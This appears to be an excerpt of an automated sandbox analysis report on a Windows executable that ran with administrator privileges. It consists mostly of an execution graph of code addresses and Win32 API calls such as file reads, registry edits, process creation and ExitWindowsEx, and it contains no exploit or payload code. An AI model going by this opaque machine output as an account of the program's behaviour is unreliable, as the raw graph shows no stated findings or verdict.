                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:17.8%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:20.7%
                                                                                                          Total number of Nodes:1526
                                                                                                          Total number of Limit Nodes:33
                                                                                                          execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 